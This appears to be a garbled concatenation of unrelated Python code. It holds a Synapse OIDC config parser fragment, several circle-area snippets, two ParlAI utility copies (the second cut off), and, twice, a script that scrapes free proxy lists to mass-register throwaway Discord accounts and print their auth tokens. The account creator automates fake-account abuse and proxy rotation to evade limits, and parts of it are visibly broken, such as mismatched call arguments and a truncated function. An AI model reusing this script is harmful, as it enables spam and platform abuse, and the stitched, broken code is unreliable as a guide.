token_endpoint=oidc_config.get("token_endpoint"), userinfo_endpoint=oidc_config.get("userinfo_endpoint"), jwks_uri=oidc_config.get("jwks_uri"), skip_verification=oidc_config.get("skip_verification", False), user_profile_method=oidc_config.get("user_profile_method", "auto"), allow_existing_users=oidc_config.get("allow_existing_users", False), user_mapping_provider_class=user_mapping_provider_class, user_mapping_provider_config=user_mapping_provider_config, attribute_requirements=attribute_requirements, ) @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderClientSecretJwtKey: # a pem-encoded signing key key: str # properties to include in the JWT header jwt_header: Mapping[str, str] # properties to include in the JWT payload. jwt_payload: Mapping[str, str] @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderConfig: # a unique identifier for this identity provider. Used in the 'user_external_ids' # table, as well as the query/path parameter used in the login protocol. idp_id: str # user-facing name for this identity provider. idp_name: str # Optional MXC URI for icon for this IdP. idp_icon: Optional[str] # Optional brand identifier for this IdP. idp_brand: Optional[str] # whether the OIDC discovery mechanism is used to discover endpoints discover: bool # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to # discover the provider's endpoints. issuer: str # oauth2 client id to use client_id: str # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate # a secret. client_secret: Optional[str] # key to use to construct a JWT to use as a client secret. May be `None` if # `client_secret` is set. client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] # auth method to use when exchanging the token. # Valid values are 'client_secret_basic', 'client_secret_post' and # 'none'. 
client_auth_method: str # list of scopes to request scopes: Collection[str] # the oauth2 authorization endpoint. Required if discovery is disabled. authorization_endpoint: Optional[str] # the oauth2 token endpoint. Required if discovery is disabled. token_endpoint: Optional[str] # the OIDC userinfo endpoint. Required if discovery is disabled and the # "openid" scope is not requested. userinfo_endpoint: Optional[str] # URI where to fetch the JWKS. Required if discovery is disabled and the # "openid" scope is used. jwks_uri: Optional[str] # Whether to skip metadata verification skip_verification: bool # Whether to fetch the user profile from the userinfo endpoint. Valid # values are: "auto" or "userinfo_endpoint". user_profile_method: str # whether to allow a user logging in via OIDC to match a pre-existing account # instead of failing allow_existing_users: bool # the class of the user mapping provider user_mapping_provider_class: Type # the config of the user mapping provider user_mapping_provider_config: Any # required attributes to require in userinfo to allow login/registration attribute_requirements: List[SsoAttributeRequirement]
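# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of Synapse). A minimal example, assuming a
# working Synapse installation so that the default Jinja mapping provider can be
# loaded; the provider values are placeholders copied from the sample config
# above, and `sample_config` is a name made up for this sketch.
if __name__ == "__main__":
    sample_config = {
        "oidc_providers": [
            {
                "idp_id": "my_idp",
                "idp_name": "My OpenID provider",
                "issuer": "https://accounts.example.com/",
                "client_id": "provided-by-your-issuer",
                "client_secret": "provided-by-your-issuer",
            }
        ]
    }
    for provider in _parse_oidc_provider_configs(sample_config):
        # the parser prefixes the given idp_id with "oidc-" (unless it is exactly "oidc")
        print(provider.idp_id, provider.idp_name, provider.issuer)
        # -> oidc-my_idp My OpenID provider https://accounts.example.com/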
# area of a circle = pi (3.14159265359) * radius**2  (π × r × r)

from math import pi

# Note: nesting the same quote type inside an f-string requires Python 3.12+ (PEP 701).
print(f"area of circle is {pi * float(input("Enter radius: "))**2}")

# This solves the problem in a single line after importing the library.
# There are many other ways to solve it.
# Good luck!
# area of a circle = pi (3.14159265359) * radius**2  (π × r × r)

from math import pi
print(f"area of circle is {pi * float(input('Enter radius: '))**2}")

# This solves the problem in a single line after importing the library.
# There are many other ways to solve it.
# Good luck!
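# An alternative, more explicit version of the same calculation (illustrative
# only): read the radius into a variable first, then compute and round the area.
from math import pi

radius = float(input("Enter radius: "))
area = pi * radius ** 2
print(f"area of circle is {round(area, 2)}")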
from argparse import ArgumentParser from string import ascii_letters, digits from random import randint, choice from requests import get, post from requests_html import AsyncHTMLSession as a from threading import Thread # get 600 http(s) proxies, lists fplproxies.py async def 一(): return await a().get('https://free-proxy-list.net', timeout=30) # 300 async def 二(): return await a().get('https://www.us-proxy.org', timeout=30) # 200 async def 三(): return await a().get('https://www.sslproxies.org', timeout=30) # 100 threads2 = [] def fpl(): results = a().run(一, 二, 三) proxies = '' # to join lists for result in results: cells = result.html.find('td') s = '' # string to parse -> list for cell in cells: c = cell.text if not c.lower().islower(): # lowercase all letters and then check if islower to determine if the cell contains letters (only ip and port cells will remain) if '.' in c: c = '\n' + c + ':' # ip will have "." then add newline in front of ip to separate proxies \nip:port\nip:port s += c proxies += s fpl = [] for proxy in proxies.split('\n'): if proxy != '': fpl.append(proxy) return fpl # discrim-http(s).py def dac(proxylist, verbose): # todo: threads from time import time, strftime, gmtime # imported in def because of UnboundLocalError: local variable 'time' referenced before assignment d = 'https://discordapp.com/api/v6/users/@me' ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/' + \ '537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' accounts = 0 start_time = time() for p in proxylist: l = f'{''.join([choice(ascii_letters + digits) for n in range(randint(9,12))])}@gmail.com' # login, email & pass try: t = post(f'{d[0:27]}auth/register', timeout=10, headers={'User-Agent': ua}, proxies={'http': 'http://' + p, 'https': 'http://' + p}, json={ 'consent': 'true', 'username': l.split('@')[0], 'email': l, 'password': l } ).json() if 'token' in t: accounts = accounts + 1 try: # get discrim # print(f'\033[96m'+get(d, timeout=20, headers={'User-Agent': ua, 'Authorization': t['token']}, proxies={'http': 'http://' + p, 'https': 'http://' + p} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: try: # try again without proxy print(f'\033[96m'+get(d, timeout=30, headers={'User-Agent': ua, 'Authorization': t['token']} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: # at least print token and login to later try to get discrim again manually with above req print(f'\033[96m????', l, t["token"], p, '\033[0m') else: if verbose == True: print(f'\u001b[38;5;90m{t} {p}\033[0m') # reg fail // -v commented out to only show success except: pass # timer and print loop stats time = strftime('%H:%M:%S', gmtime(time() - start_time)) print('\033[45;96maccounts created:', f'{accounts}. time elapsed: {time}. going again~=^.^=💫\033[0m') def main(): parser = ArgumentParser(description='discord account creator // async + proxies') parser.add_argument('-x', '--x', help='go through list only once and exit', action='store_true') parser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true') parser.add_argument('-t', '--threads', help='number of threads (default: 5)', type=int) parser.add_argument('-p', '--proxies', help='custom proxy list (ip:port' + '\\' + 'n)') args = parser.parse_args() v = args.verbose if args.threads: t = args.threads else: t = 5 if args.proxies: pl = [] with open(args.proxies) as proxies: for proxy in proxies.readlines(): pl.append(proxy.rstrip('\n')) else: # if no proxies provided, use free proxy lists. 
pl = fpl() print('Generating...💫') if args.x: dac(pl, v, t) else: # usually for running through a proxy list only once while True: dac(pl, v, t) def if_threads(thread_count): for i in range(thre if __name__ == "__main__": main()
from argparse import ArgumentParser from string import ascii_letters, digits from random import randint, choice from requests import get, post from requests_html import AsyncHTMLSession as a from threading import Thread # get 600 http(s) proxies, lists fplproxies.py async def 一(): return await a().get('https://free-proxy-list.net', timeout=30) # 300 async def 二(): return await a().get('https://www.us-proxy.org', timeout=30) # 200 async def 三(): return await a().get('https://www.sslproxies.org', timeout=30) # 100 threads2 = [] def fpl(): results = a().run(一, 二, 三) proxies = '' # to join lists for result in results: cells = result.html.find('td') s = '' # string to parse -> list for cell in cells: c = cell.text if not c.lower().islower(): # lowercase all letters and then check if islower to determine if the cell contains letters (only ip and port cells will remain) if '.' in c: c = '\n' + c + ':' # ip will have "." then add newline in front of ip to separate proxies \nip:port\nip:port s += c proxies += s fpl = [] for proxy in proxies.split('\n'): if proxy != '': fpl.append(proxy) return fpl # discrim-http(s).py def dac(proxylist, verbose): # todo: threads from time import time, strftime, gmtime # imported in def because of UnboundLocalError: local variable 'time' referenced before assignment d = 'https://discordapp.com/api/v6/users/@me' ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/' + \ '537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' accounts = 0 start_time = time() for p in proxylist: l = f'{"".join([choice(ascii_letters + digits) for n in range(randint(9,12))])}@gmail.com' # login, email & pass try: t = post(f'{d[0:27]}auth/register', timeout=10, headers={'User-Agent': ua}, proxies={'http': 'http://' + p, 'https': 'http://' + p}, json={ 'consent': 'true', 'username': l.split('@')[0], 'email': l, 'password': l } ).json() if 'token' in t: accounts = accounts + 1 try: # get discrim # print(f'\033[96m'+get(d, timeout=20, headers={'User-Agent': ua, 'Authorization': t['token']}, proxies={'http': 'http://' + p, 'https': 'http://' + p} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: try: # try again without proxy print(f'\033[96m'+get(d, timeout=30, headers={'User-Agent': ua, 'Authorization': t['token']} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: # at least print token and login to later try to get discrim again manually with above req print(f'\033[96m????', l, t["token"], p, '\033[0m') else: if verbose == True: print(f'\u001b[38;5;90m{t} {p}\033[0m') # reg fail // -v commented out to only show success except: pass # timer and print loop stats time = strftime('%H:%M:%S', gmtime(time() - start_time)) print('\033[45;96maccounts created:', f'{accounts}. time elapsed: {time}. going again~=^.^=💫\033[0m') def main(): parser = ArgumentParser(description='discord account creator // async + proxies') parser.add_argument('-x', '--x', help='go through list only once and exit', action='store_true') parser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true') parser.add_argument('-t', '--threads', help='number of threads (default: 5)', type=int) parser.add_argument('-p', '--proxies', help='custom proxy list (ip:port' + '\\' + 'n)') args = parser.parse_args() v = args.verbose if args.threads: t = args.threads else: t = 5 if args.proxies: pl = [] with open(args.proxies) as proxies: for proxy in proxies.readlines(): pl.append(proxy.rstrip('\n')) else: # if no proxies provided, use free proxy lists. 
pl = fpl() print('Generating...💫') if args.x: dac(pl, v, t) else: # usually for running through a proxy list only once while True: dac(pl, v, t) def if_threads(thread_count): for i in range(thre if __name__ == "__main__": main()
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """ File for miscellaneous utility functions and constants. """ from collections import deque import math import random import time from typing import Union, Optional, Set, Any, Dict, List import warnings import json from parlai.core.message import Message try: import torch __TORCH_AVAILABLE = True except ImportError: # silence the error, we'll have other problems later if it's super necessary __TORCH_AVAILABLE = False DISPLAY_MESSAGE_DEFAULT_FIELDS = { 'episode_done', 'id', 'image', 'text', 'labels', 'eval_labels', 'label_candidates', 'text_candidates', 'reward', 'eval_labels_vec', 'text_vec', 'label_candidates_vecs', 'token_losses', } def maintain_dialog_history( history, observation, reply='', historyLength=1, useReplies='label_else_model', dict=None, useStartEndIndices=True, splitSentences=False, ): """ Keep track of dialog history, up to a truncation length. Either includes replies from the labels, model, or not all using param 'replies'. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def parse(txt, splitSentences): if dict is not None: if splitSentences: vec = [dict.txt2vec(t) for t in txt.split('\n')] else: vec = dict.txt2vec(txt) return vec else: return [txt] if 'dialog' not in history: history['dialog'] = deque(maxlen=historyLength) history['episode_done'] = False history['labels'] = [] if history['episode_done']: history['dialog'].clear() history['labels'] = [] useReplies = 'none' history['episode_done'] = False if useReplies != 'none': if useReplies == 'model' or ( useReplies == 'label_else_model' and len(history['labels']) == 0 ): if reply: if useStartEndIndices: reply = dict.start_token + ' ' + reply history['dialog'].extend(parse(reply, splitSentences)) elif len(history['labels']) > 0: r = history['labels'][0] history['dialog'].extend(parse(r, splitSentences)) obs = observation if 'text' in obs: if useStartEndIndices: obs['text'] = dict.end_token + ' ' + obs['text'] history['dialog'].extend(parse(obs['text'], splitSentences)) history['episode_done'] = obs['episode_done'] labels = obs.get('labels', obs.get('eval_labels', None)) if labels is not None: if useStartEndIndices: history['labels'] = [dict.start_token + ' ' + l for l in labels] else: history['labels'] = labels return history['dialog'] def load_cands(path, lines_have_ids=False, cands_are_replies=False): """ Load global fixed set of candidate labels that the teacher provides. Every example will include these as candidates. The true labels for a specific example are also added to this set, so that it's possible to get the right answer. """ if path is None: return None cands = [] cnt = 0 with open(path) as read: for line in read: line = line.strip().replace('\\n', '\n') if len(line) > 0: cnt = cnt + 1 # If lines are numbered we strip them of numbers. if cnt == 1 and line[0:2] == '1 ': lines_have_ids = True # If tabs then the label_candidates are all the replies. if '\t' in line and not cands_are_replies: cands_are_replies = True cands = [] if lines_have_ids: space_idx = line.find(' ') line = line[space_idx + 1 :] if cands_are_replies: sp = line.split('\t') if len(sp) > 1 and sp[1] != '': cands.append(sp[1]) else: cands.append(line) else: cands.append(line) return cands class Predictor(object): """ Wrapper to set up running version of model and request predictions. 
Note that this maintains no World state (does not use a World), merely providing the observation directly to the model and getting a response. This is limiting when it comes to certain use cases, but allows for quick model deployment. """ def __init__(self, args=None, **kwargs): """ Initialize the predictor, setting up opt automatically if needed. Args is expected to be in the same format as sys.argv: e.g. a list in the form ['--model', 'seq2seq', '-hs', 128, '-lr', 0.5]. kwargs is interpreted by appending '--' to it and replacing underscores with hyphens, so 'dict_file=/tmp/dict.tsv' would be interpreted as '--dict-file /tmp/dict.tsv'. """ from parlai.core.params import ParlaiParser from parlai.core.agents import create_agent if args is None: args = [] for k, v in kwargs.items(): args.append('--' + str(k).replace('_', '-')) args.append(str(v)) parser = ParlaiParser(True, True) self.opt = parser.parse_args(args) self.agent = create_agent(self.opt) def predict(self, observation): """ From a ParlAI-standard message dict, get model prediction. """ if 'episode_done' not in observation: observation['episode_done'] = True self.agent.observe(observation) reply = self.agent.act() return reply class Timer(object): """ Computes elapsed time. """ def __init__(self): """ Initialize timer. """ self.running = True self.total = 0 self.start = time.time() def reset(self): """ Reset timer to zero. """ self.running = True self.total = 0 self.start = time.time() return self def resume(self): """ Resume timer. """ if not self.running: self.running = True self.start = time.time() return self def stop(self): """ Pause timer. """ if self.running: self.running = False self.total += time.time() - self.start return self def time(self): """ Get current timer time. """ if self.running: return self.total + time.time() - self.start return self.total class TimeLogger: """ Class for logging time progress against a goal. """ def __init__(self): """ Set up timer. """ self.timer = Timer() self.tot_time = 0 def total_time(self): """ Return time elapsed at last log call. """ return self.tot_time def time(self): """ Return current timer time. """ return self.timer.time() def log(self, done, total, report=None): """ Log report, time elapsed, and percentage progress towards goal. :param done: number of examples completed so far :param total: total number of elements to be completed. if total > 0, calculates the time remaining and percentage complete. :param report: dict of pairs to log :returns: tuple log string, log dict log string contains time elapsed and string representation of the log dict log dict contains pairs of all items to log, which includes percentage complete and projected time left if total > 0 """ from parlai.core.metrics import Metric # delay import to prevent circular dep if isinstance(done, Metric): done = done.value() self.tot_time += self.timer.time() self.timer.reset() log = {} log['exs'] = done if total > 0: log['%done'] = done / total if log["%done"] > 0: time_left = self.tot_time / log['%done'] - self.tot_time log['time_left'] = str(int(time_left)) + 's' z = '%.2f' % (100 * log['%done']) log['%done'] = str(z) + '%' if report: log = {**report, **log} int_time = int(self.tot_time) report_s = json.dumps(nice_report(log)) text = f'{int_time}s elapsed: {report_s}' return text, log class AttrDict(dict): """ Helper class to have a dict-like object with dot access. For example, instead of `d = {'key': 'value'}` use `d = AttrDict(key='value')`. To access keys, instead of doing `d['key']` use `d.key`. 
While this has some limitations on the possible keys (for example, do not set the key `items` or you will lose access to the `items()` method), this can make some code more clear. """ def __init__(self, *args, **kwargs): """ Initialize AttrDict using input dict. """ super().__init__(*args, **kwargs) self.__dict__ = self class NoLock(object): """ Empty `lock`. Does nothing when you enter or exit. """ def __enter__(self): """ No-op. """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """ No-op. """ pass def nice_report(report): from parlai.core.metrics import Metric output = {} for k, v in report.items(): if isinstance(v, Metric): v = v.value() if isinstance(v, float): v = round_sigfigs(v, 4) output[k] = v return output def round_sigfigs(x: Union[float, 'torch.Tensor'], sigfigs=4) -> float: """ Round value to specified significant figures. :param x: input number :param sigfigs: number of significant figures to return :returns: float number rounded to specified sigfigs """ x_: float if __TORCH_AVAILABLE and isinstance(x, torch.Tensor): x_ = x.item() else: x_ = x # type: ignore try: if x_ == 0: return 0 return round(x_, -math.floor(math.log10(abs(x_)) - sigfigs + 1)) except (ValueError, OverflowError) as ex: if x_ in [float('inf'), float('-inf')] or x_ != x_: # inf or nan return x_ else: raise ex single_nolock = NoLock() def no_lock(): """ Build a nolock for other classes to use for no-op locking. """ return single_nolock class PaddingUtils(object): """ Helps with padding input and target tensors. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ # DEPRECATIONDAY: delete! @classmethod def pad_text( cls, observations, dictionary, end_idx=None, null_idx=0, dq=False, eval_labels=True, truncate=None, ): """ Pad observations to max width. We check that examples are valid, pad with zeros, and sort by length so that we can use the pack_padded function. The list valid_inds keeps track of which indices are valid and the order in which we sort the examples. dq -- whether we should use deque or list eval_labels -- whether or not we want to consider eval labels truncate -- truncate input and output lengths DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. 
""" def valid(obs): # check if this is an example our model should actually process return 'text' in obs and len(obs['text']) > 0 try: # valid examples and their indices valid_inds, exs = zip( *[(i, ex) for i, ex in enumerate(observations) if valid(ex)] ) except ValueError: # zero examples to process in this batch, so zip failed to unpack return None, None, None, None, None, None # `x` text is already tokenized and truncated # sort by length so we can use pack_padded if any(['text2vec' in ex for ex in exs]): parsed_x = [ex['text2vec'] for ex in exs] else: parsed_x = [dictionary.txt2vec(ex['text']) for ex in exs] if len(parsed_x) > 0 and not isinstance(parsed_x[0], deque): if dq: parsed_x = [deque(x, maxlen=truncate) for x in parsed_x] elif truncate is not None and truncate > 0: parsed_x = [x[-truncate:] for x in parsed_x] x_lens = [len(x) for x in parsed_x] ind_sorted = sorted(range(len(x_lens)), key=lambda k: -x_lens[k]) exs = [exs[k] for k in ind_sorted] valid_inds = [valid_inds[k] for k in ind_sorted] parsed_x = [parsed_x[k] for k in ind_sorted] end_idxs = [x_lens[k] for k in ind_sorted] eval_labels_avail = any(['eval_labels' in ex for ex in exs]) labels_avail = any(['labels' in ex for ex in exs]) if eval_labels: some_labels_avail = eval_labels_avail or labels_avail else: some_labels_avail = labels_avail max_x_len = max(x_lens) # pad with zeros if dq: parsed_x = [ x if len(x) == max_x_len else x + deque((null_idx,)) * (max_x_len - len(x)) for x in parsed_x ] else: parsed_x = [ x if len(x) == max_x_len else x + [null_idx] * (max_x_len - len(x)) for x in parsed_x ] xs = parsed_x # set up the target tensors ys = None labels = None y_lens = None if some_labels_avail: # randomly select one of the labels to update on (if multiple) if labels_avail: labels = [random.choice(ex.get('labels', [''])) for ex in exs] else: labels = [random.choice(ex.get('eval_labels', [''])) for ex in exs] # parse each label and append END if dq: parsed_y = [deque(maxlen=truncate) for _ in labels] for deq, y in zip(parsed_y, labels): deq.extendleft(reversed(dictionary.txt2vec(y))) else: parsed_y = [dictionary.txt2vec(label) for label in labels] if end_idx is not None: for y in parsed_y: y.append(end_idx) y_lens = [len(y) for y in parsed_y] max_y_len = max(y_lens) if dq: parsed_y = [ y if len(y) == max_y_len else y + deque((null_idx,)) * (max_y_len - len(y)) for y in parsed_y ] else: parsed_y = [ y if len(y) == max_y_len else y + [null_idx] * (max_y_len - len(y)) for y in parsed_y ] ys = parsed_y return xs, ys, labels, valid_inds, end_idxs, y_lens @classmethod def map_predictions( cls, predictions, valid_inds, batch_reply, observations, dictionary, end_idx, report_freq=0.1, labels=None, answers=None, ys=None, ): """ Match predictions to original index in the batch. Predictions are mapped back to appropriate indices in the batch_reply using valid_inds. report_freq -- how often we report predictions DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. 
""" for i in range(len(predictions)): # map the predictions back to non-empty examples in the batch # we join with spaces since we produce tokens one at a timelab curr = batch_reply[valid_inds[i]] output_tokens = [] j = 0 for c in predictions[i]: if c == end_idx and j != 0: break else: output_tokens.append(c) j += 1 curr_pred = dictionary.vec2txt(output_tokens) curr['text'] = curr_pred if labels is not None and answers is not None and ys is not None: y = [] for c in ys[i]: if c == end_idx: break else: y.append(c) answers[valid_inds[i]] = y elif answers is not None: answers[valid_inds[i]] = curr_pred if random.random() > (1 - report_freq): # log sometimes print('TEXT: ', observations[valid_inds[i]]['text']) print('PREDICTION: ', curr_pred, '\n~') return def clip_text(text, max_len): """ Clip text to max length, adding ellipses. """ if len(text) > max_len: begin_text = ' '.join(text[: math.floor(0.8 * max_len)].split(' ')[:-1]) end_text = ' '.join( text[(len(text) - math.floor(0.2 * max_len)) :].split(' ')[1:] ) if len(end_text) > 0: text = begin_text + ' ...\n' + end_text else: text = begin_text + ' ...' return text def _ellipse(lst: List[str], max_display: int = 5, sep: str = '|') -> str: """ Like join, but possibly inserts an ellipsis. :param lst: The list to join on :param int max_display: the number of items to display for ellipsing. If -1, shows all items :param string sep: the delimiter to join on """ # copy the list (or force it to a list if it's a set) choices = list(lst) # insert the ellipsis if necessary if max_display > 0 and len(choices) > max_display: ellipsis = '...and {} more'.format(len(choices) - max_display) choices = choices[:max_display] + [ellipsis] return sep.join(str(c) for c in choices) def display_messages( msgs: List[Dict[str, Any]], prettify: bool = False, ignore_fields: str = '', max_len: int = 1000, ) -> Optional[str]: """ Return a string describing the set of messages provided. If prettify is true, candidates are displayed using prettytable. ignore_fields provides a list of fields in the msgs which should not be displayed. """ def _token_losses_line( msg: Dict[str, Any], ignore_fields: List[str], space: str ) -> Optional[str]: """ Displays the loss associated with each token. Can be used for debugging generative models. See TorchGeneratorAgent._construct_token_losses for an example implementation. """ key = 'token_losses' token_losses = msg.get(key, None) if key in ignore_fields or not token_losses: return None # Reduce losses to 4 significant figures formatted_tl = ' | '.join( [f"{tl[0]} {float("{:.4g}".format(tl[1]))}" for tl in token_losses] ) return f'{space}[{key}]: {formatted_tl}' lines = [] episode_done = False ignore_fields_ = ignore_fields.split(',') for index, msg in enumerate(msgs): if msg is None or (index == 1 and 'agent_reply' in ignore_fields_): # We only display the first agent (typically the teacher) if we # are ignoring the agent reply. continue if msg.get('episode_done'): episode_done = True # Possibly indent the text (for the second speaker, if two). space = '' if len(msgs) == 2 and index == 1: space = ' ' # Only display rewards !=0 as they are confusing in non-RL tasks. 
if msg.get('reward', 0) != 0: lines.append(space + '[reward: {r}]'.format(r=msg['reward'])) for key in msg: if key not in DISPLAY_MESSAGE_DEFAULT_FIELDS and key not in ignore_fields_: if type(msg[key]) is list: line = '[' + key + ']:\n ' + _ellipse(msg[key], sep='\n ') else: line = '[' + key + ']: ' + clip_text(str(msg.get(key)), max_len) lines.append(space + line) if type(msg.get('image')) in [str, torch.Tensor]: lines.append(f'[ image ]: {msg['image']}') if msg.get('text', ''): text = clip_text(msg['text'], max_len) ID = '[' + msg['id'] + ']: ' if 'id' in msg else '' lines.append(space + ID + text) for field in {'labels', 'eval_labels', 'label_candidates', 'text_candidates'}: if msg.get(field) and field not in ignore_fields_: lines.append('{}[{}: {}]'.format(space, field, _ellipse(msg[field]))) # Handling this separately since we need to clean up the raw output before displaying. token_loss_line = _token_losses_line(msg, ignore_fields_, space) if token_loss_line: lines.append(token_loss_line) if episode_done: lines.append('- - - - - - - - - - - - - - - - - - - - -') return '\n'.join(lines) def str_to_msg(txt, ignore_fields=''): """ Convert formatted string to ParlAI message dict. :param txt: formatted string to convert. String format is tab-separated fields, with colon separating field name and contents. :param ignore_fields: (default '') comma-separated field names to not include in the msg dict even if they're in the string. """ def tostr(txt): txt = str(txt) txt = txt.replace('\\t', '\t') txt = txt.replace('\\n', '\n') txt = txt.replace('__PIPE__', '|') return txt def tolist(txt): vals = txt.split('|') for v in vals: v = tostr(v) return vals def convert(key, value): if key == 'text' or key == 'id': return tostr(value) elif ( key == 'label_candidates' or key == 'labels' or key == 'eval_labels' or key == 'text_candidates' ): return tolist(value) elif key == 'episode_done': return bool(value) else: return tostr(value) if txt == '' or txt is None: return None msg = {} for t in txt.split('\t'): ind = t.find(':') key = t[:ind] value = t[ind + 1 :] if key not in ignore_fields.split(','): msg[key] = convert(key, value) msg['episode_done'] = msg.get('episode_done', False) return Message(msg) def msg_to_str(msg, ignore_fields=''): """ Convert ParlAI message dict to string. :param msg: dict to convert into a string. :param ignore_fields: (default '') comma-separated field names to not include in the string even if they're in the msg dict. """ def filter(txt): txt = str(txt) txt = txt.replace('\t', '\\t') txt = txt.replace('\n', '\\n') txt = txt.replace('|', '__PIPE__') return txt def add_field(name, data): if name == 'reward' and data == 0: return '' if name == 'episode_done' and data is False: return '' txt = '' if type(data) == tuple or type(data) == set or type(data) == list: # list entries for c in data: txt += filter(c) + "|" txt = txt[:-1] else: # single fields txt = filter(data) return name + ":" + txt + '\t' default_fields = [ 'id', 'text', 'labels', 'label_candidates', 'episode_done', 'reward', ] txt = "" ignore_fields = ignore_fields.split(',') for f in default_fields: if f in msg and f not in ignore_fields: txt += add_field(f, msg[f]) for f in msg.keys(): if f not in default_fields and f not in ignore_fields: txt += add_field(f, msg[f]) return txt.rstrip('\t') # DEPRECATION DAY: DELETE def set_namedtuple_defaults(namedtuple, default=None): """ Set *all* of the fields for a given nametuple to a singular value. Additionally removes the default docstring for each field. 
Modifies the tuple in place, but returns it anyway. More info: https://stackoverflow.com/a/18348004 :param namedtuple: A constructed collections.namedtuple :param default: The default value to set. :returns: the modified namedtuple """ namedtuple.__new__.__defaults__ = (default,) * len(namedtuple._fields) for f in namedtuple._fields: del getattr(namedtuple, f).__doc__ return namedtuple _seen_warnings: Set[str] = set() def warn_once(msg: str, warningtype=None) -> None: """ Raise a warning, but only once. :param str msg: Message to display :param Warning warningtype: Type of warning, e.g. DeprecationWarning """ global _seen_warnings if msg not in _seen_warnings: _seen_warnings.add(msg) warnings.warn(msg, warningtype, stacklevel=2)
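# ---------------------------------------------------------------------------
# Illustrative sketch (not part of ParlAI): round-tripping the tab-separated
# message format handled by str_to_msg / msg_to_str above. The sample line is
# made up for illustration.
if __name__ == "__main__":
    line = "id:teacher\ttext:hello\\nworld\tlabels:hi|hey\tepisode_done:True"
    msg = str_to_msg(line)
    print(msg["text"])       # "hello\nworld" with the escaped newline restored
    print(msg["labels"])     # ['hi', 'hey']
    print(msg_to_str(msg))   # serialises back to the tab-separated form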
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """ File for miscellaneous utility functions and constants. """ from collections import deque import math import random import time from typing import Union, Optional, Set, Any, Dict, List import warnings import json from parlai.core.message import Message try: import torch __TORCH_AVAILABLE = True except ImportError: # silence the error, we'll have other problems later if it's super necessary __TORCH_AVAILABLE = False DISPLAY_MESSAGE_DEFAULT_FIELDS = { 'episode_done', 'id', 'image', 'text', 'labels', 'eval_labels', 'label_candidates', 'text_candidates', 'reward', 'eval_labels_vec', 'text_vec', 'label_candidates_vecs', 'token_losses', } def maintain_dialog_history( history, observation, reply='', historyLength=1, useReplies='label_else_model', dict=None, useStartEndIndices=True, splitSentences=False, ): """ Keep track of dialog history, up to a truncation length. Either includes replies from the labels, model, or not all using param 'replies'. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def parse(txt, splitSentences): if dict is not None: if splitSentences: vec = [dict.txt2vec(t) for t in txt.split('\n')] else: vec = dict.txt2vec(txt) return vec else: return [txt] if 'dialog' not in history: history['dialog'] = deque(maxlen=historyLength) history['episode_done'] = False history['labels'] = [] if history['episode_done']: history['dialog'].clear() history['labels'] = [] useReplies = 'none' history['episode_done'] = False if useReplies != 'none': if useReplies == 'model' or ( useReplies == 'label_else_model' and len(history['labels']) == 0 ): if reply: if useStartEndIndices: reply = dict.start_token + ' ' + reply history['dialog'].extend(parse(reply, splitSentences)) elif len(history['labels']) > 0: r = history['labels'][0] history['dialog'].extend(parse(r, splitSentences)) obs = observation if 'text' in obs: if useStartEndIndices: obs['text'] = dict.end_token + ' ' + obs['text'] history['dialog'].extend(parse(obs['text'], splitSentences)) history['episode_done'] = obs['episode_done'] labels = obs.get('labels', obs.get('eval_labels', None)) if labels is not None: if useStartEndIndices: history['labels'] = [dict.start_token + ' ' + l for l in labels] else: history['labels'] = labels return history['dialog'] def load_cands(path, lines_have_ids=False, cands_are_replies=False): """ Load global fixed set of candidate labels that the teacher provides. Every example will include these as candidates. The true labels for a specific example are also added to this set, so that it's possible to get the right answer. """ if path is None: return None cands = [] cnt = 0 with open(path) as read: for line in read: line = line.strip().replace('\\n', '\n') if len(line) > 0: cnt = cnt + 1 # If lines are numbered we strip them of numbers. if cnt == 1 and line[0:2] == '1 ': lines_have_ids = True # If tabs then the label_candidates are all the replies. if '\t' in line and not cands_are_replies: cands_are_replies = True cands = [] if lines_have_ids: space_idx = line.find(' ') line = line[space_idx + 1 :] if cands_are_replies: sp = line.split('\t') if len(sp) > 1 and sp[1] != '': cands.append(sp[1]) else: cands.append(line) else: cands.append(line) return cands class Predictor(object): """ Wrapper to set up running version of model and request predictions. 
Note that this maintains no World state (does not use a World), merely providing the observation directly to the model and getting a response. This is limiting when it comes to certain use cases, but allows for quick model deployment. """ def __init__(self, args=None, **kwargs): """ Initialize the predictor, setting up opt automatically if needed. Args is expected to be in the same format as sys.argv: e.g. a list in the form ['--model', 'seq2seq', '-hs', 128, '-lr', 0.5]. kwargs is interpreted by appending '--' to it and replacing underscores with hyphens, so 'dict_file=/tmp/dict.tsv' would be interpreted as '--dict-file /tmp/dict.tsv'. """ from parlai.core.params import ParlaiParser from parlai.core.agents import create_agent if args is None: args = [] for k, v in kwargs.items(): args.append('--' + str(k).replace('_', '-')) args.append(str(v)) parser = ParlaiParser(True, True) self.opt = parser.parse_args(args) self.agent = create_agent(self.opt) def predict(self, observation): """ From a ParlAI-standard message dict, get model prediction. """ if 'episode_done' not in observation: observation['episode_done'] = True self.agent.observe(observation) reply = self.agent.act() return reply class Timer(object): """ Computes elapsed time. """ def __init__(self): """ Initialize timer. 